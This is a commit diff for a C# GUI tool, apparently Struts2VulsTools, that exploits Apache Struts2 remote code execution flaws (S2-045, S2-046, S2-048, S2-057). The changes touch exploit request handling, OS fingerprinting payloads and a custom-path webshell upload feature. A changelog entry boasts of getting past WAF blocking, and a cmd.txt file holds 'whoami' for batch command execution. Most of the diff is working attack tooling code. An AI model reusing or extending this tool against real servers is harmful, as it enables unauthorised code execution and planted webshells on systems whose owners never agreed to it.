update20190925

update20190925

Test/Main.cs

@@ -113,6 +113,7 @@ public String request(String method, String url, String data, String exp, String
                 {
                     request.Method = "POST";
                     request.ContentType = "multipart/form-data";
+                    request.AddMuHeader("\"" + data + "\"", "x");
                 }
                 else
                 {
@@ -138,10 +139,6 @@ public String request(String method, String url, String data, String exp, String
                     request.ContentType = exp;
 
                 }
-                else {
-
-                    request.AddMuHeader("\"" + data + "\"", "x");
-                }
 
                 String body = request.GetBody(data);
                 request.Body = body;
@@ -321,7 +318,7 @@ public void getVerinfo()
             else if (!vul.Equals("S2-045") && !vul.Equals("S2-046"))
             {
 
-                result = Tools.getContent(request(method, url, "", bp.Get_Exp_VerInfo("os.name"), cookie, vul), vul) + "\r\n";
+                result = Tools.getContent(request(method, url, bp.Get_Exp_VerInfo("os.name"),"" , cookie, vul), vul) + "\r\n";
                 result += Tools.getContent(request(method, url, bp.Get_Exp_VerInfo("os.version"), "", cookie, vul), vul) + "\r\n";
                 result += Tools.getContent(request(method, url, bp.Get_Exp_Path(), "", cookie, vul), vul) + "\r\n";
             }
@@ -441,7 +438,7 @@ public void executeBatchCmd(Object url)
             this.btn_exeBatchCMD.Enabled = true;
         }
 
-        public static int version = 20190617;
+        public static int version = 20190925;
         public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=Struts2VulsTools&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
         //检查更新
         public void checkUpdate()
@@ -534,11 +531,22 @@ public void uploadFile()
             String url = this.txt_url.Text;
             String cookie = this.txt_cookie.Text;
             String result = Tools.getContent(uploadFile(url,shellPath, shellName,cookie,this.com_vul.Text), this.com_vul.Text);
-
+            String path = "";
+            String pathfilename = "";
             if (result.IndexOf("okokok") != -1)
             {
-                MessageBox.Show("上传成功----" + getFilePath(url, result, shellName));
-                LogError("上传访问路径：" + getFilePath(url, result, shellName));
+                if (this.setUploudPath.Checked&& !"".Equals(shellPath))
+                {
+
+                    path = shellPath;
+                    pathfilename = shellPath + shellName;
+                }
+                else {
+                    pathfilename = getFilePath(url, result, shellName);
+                }
+                MessageBox.Show("上传成功----" + pathfilename);
+
+                LogError("上传访问路径：" + pathfilename);
             }
             else {
                 LogError("上传失败！");
@@ -554,7 +562,7 @@ public String getFilePath(String url,String result,String fileName) {
             if (c != -1)
             {
                 String cpath = result.Substring(c);
-                return rootPath + cpath.Replace("okokok","")+ "/"+ fileName;
+                return rootPath + result.Replace("okokok","")+ "/"+ fileName;
             }
             else {
                 return "未获取到shell路径，请人工访问。";
@@ -568,9 +576,8 @@ public String uploadFile(String url,String shellPath,String shellName,String coo
             String fileContent = this.txt_shellContent.Text;
             String fileContent_encode = System.Web.HttpUtility.UrlEncode(fileContent, Encoding.UTF8);
             String path = "";
-            if (!"如：/home/web/shell.jsp".Equals(shellPath) && !"".Equals(shellPath))
+            if (this.setUploudPath.Checked && !"".Equals(shellPath))
             {
-
                 path = shellPath;
             }
             BasePayload bp = getPayload(vulName);
@@ -1077,5 +1084,17 @@ private void com_vul_TextChanged(object sender, EventArgs e)
                 MessageBox.Show("S2-045,S2-046不支持复杂数据类型提交！");
             }
         }
+
+        private void setUploudPath_CheckStateChanged(object sender, EventArgs e)
+        {
+            if (this.setUploudPath.Checked)
+            {
+                this.txt_shellPath.Enabled = true;
+            }
+            else
+            {
+                this.txt_shellPath.Enabled = false;
+            }
+        }
     }
 }

Test/Main.resx

@@ -118,7 +118,9 @@
     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
   </resheader>
   <data name="txt_info.Text" xml:space="preserve">
-    <value>2018-08-24：
+    <value>2019-09-25：
+优化部分EXP在部分情况下被WAF拦截的问题，提高检测成功率，优化自定义上传路径exp，文件所在目录不存在时自动创建目录，防止文件因为目录不存在，导致上传失败。
+2018-08-24：
 增加S2-057 Struts 2.3 to 2.3.34，Struts 2.5 to 2.5.16  此漏洞影响范围非常小，要求配置条件比较苛刻，同时，一些特定版本没有看到有沙盒绕过，所以，目前exp只是基于S2-045改写的，所以exp并不是所有版本都能用，正常情况下Struts 2.3.5-2.3.31,Struts 2.5-2.5.10版本可以使用此exp。
 2017-07-07：
 增加S2-048 Struts 2.3.X  支持检查官方示例struts2-showcase应用的代码执行漏洞，参考地址：http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action

Test/Properties/AssemblyInfo.cs

@@ -10,7 +10,7 @@
 [assembly: AssemblyConfiguration("")]
 [assembly: AssemblyCompany("Microsoft")]
 [assembly: AssemblyProduct("Test")]
-[assembly: AssemblyCopyright("Copyright © Microsoft 2017")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2019")]
 [assembly: AssemblyTrademark("")]
 [assembly: AssemblyCulture("")]
 
@@ -32,5 +32,5 @@
 // 可以指定所有这些值，也可以使用“内部版本号”和“修订号”的默认值，
 // 方法是按如下所示使用“*”:
 // [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.8.0.0")]
-[assembly: AssemblyFileVersion("1.8.0.0")]
+[assembly: AssemblyVersion("2.2.0.0")]
+[assembly: AssemblyFileVersion("2.2.0.0")]

Test/bin/Debug/Test.vshost.exe.manifest

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
+    <security>
+      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
+        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+</assembly>

Test/bin/Debug/cmd.txt

@@ -0,0 +1 @@
+whoami

Test/bin/Release/Test.exe.config

@@ -0,0 +1,3 @@
+<?xml version="1.0"?>
+<configuration>
+<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></startup></configuration>

Test/bin/Release/Test.vshost.exe.config

@@ -0,0 +1,3 @@
+<?xml version="1.0"?>
+<configuration>
+<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></startup></configuration>

Test/http/model/Config.cs

@@ -15,5 +15,6 @@ public class Config
         public String FileContent = "";
         public Boolean isExeCMD = false;
         public Boolean isUpFile = false;
+        public Boolean isSetUploadPath = false;
     }
 }